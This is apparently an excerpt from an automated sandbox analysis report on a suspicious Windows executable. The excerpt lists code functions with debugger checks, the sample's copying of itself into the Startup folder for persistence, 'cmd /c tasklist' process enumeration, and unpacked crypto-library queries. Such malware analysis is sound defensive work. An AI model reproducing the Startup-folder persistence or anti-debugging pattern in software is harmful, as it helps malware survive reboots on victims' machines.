            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAA462AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAA462AA0
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAA463068 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAA463068
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAA6AABE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAA6AABE0
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB3E1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB3E1960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB3E1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB3E1390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB5F1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB5F1390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB5F1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB5F1960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB601390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB601390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB601960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB601960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB611390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB611390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB611960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB611960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB621390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB621390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB621960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB621960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB631390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB631390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB631960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB631960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB641390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB641390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB641960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB641960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB651390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB651390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB651960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB651960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB661390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB661390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB661960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB661960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB671390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB671390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB671960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB671960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB681390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB681390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB681960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB681960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB691390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB691390
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB691960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB691960
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB6B42E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB6B42E8
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB6B3D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB6B3D20
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB6DFFF8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FFBAB6DFFF8
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB6DFA30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00007FFBAB6DFA30
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 2_2_00007FFBAB7C7030 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,2_2_00007FFBAB7C7030
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF76932BCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF76932BCE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF76933ABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF76933ABD8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF76932C57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF76932C57C
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 9_2_00007FF76932C760 SetUnhandledExceptionFilter,9_2_00007FF76932C760
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBA8CA3068 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBA8CA3068
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBA8CA2AA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBA8CA2AA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA291390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAA291390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA291960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAA291960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2A1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAA2A1390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA2A1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAA2A1960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAA3DABE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAA3DABE0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB321960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB321960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB321390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB321390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB331960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB331960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB331390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB331390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB341960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB341960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB341390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB341390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB351960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB351960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB351390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB351390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB361960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB361960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB361390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB361390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB371960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB371960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB371390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB371390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB381960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB381960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB381390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB381390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB391960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB391960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB391390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB391390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3A1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB3A1960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3A1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB3A1390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3B1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB3B1960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3B1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB3B1390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3C1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB3C1960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3C1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB3C1390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3D1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBAB3D1960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBAB3D1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBAB3D1390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB6F1390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB6F1390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB6F1960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB6F1960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB701390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB701390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB701960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB701960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB711960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB711960
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB711390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB711390
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB733D20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB733D20
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7342E8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB7342E8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB751430 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB751430
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB751A00 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB751A00
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB761A30 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB761A30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB761460 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB761460
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB774660 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB774660
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB774090 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB774090
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB79BEA0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB79BEA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB79B8D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB79B8D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7BFFF8 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB7BFFF8
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7BFA30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB7BFA30
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7F1FA0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB7F1FA0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB7F19D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB7F19D0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB801C20 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_00007FFBBB801C20
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB8021F0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB8021F0
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeCode function: 10_2_00007FFBBB822126 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00007FFBBB822126
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeProcess created: C:\Users\user\Desktop\HyZh4pn0RF.exe "C:\Users\user\Desktop\HyZh4pn0RF.exe"Jump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe" Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeCode function: 0_2_00007FF78F4A9E40 cpuid 0_2_00007FF78F4A9E40
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto\Cipher VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\HyZh4pn0RF.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\Crypto VolumeInformationJump to behavior
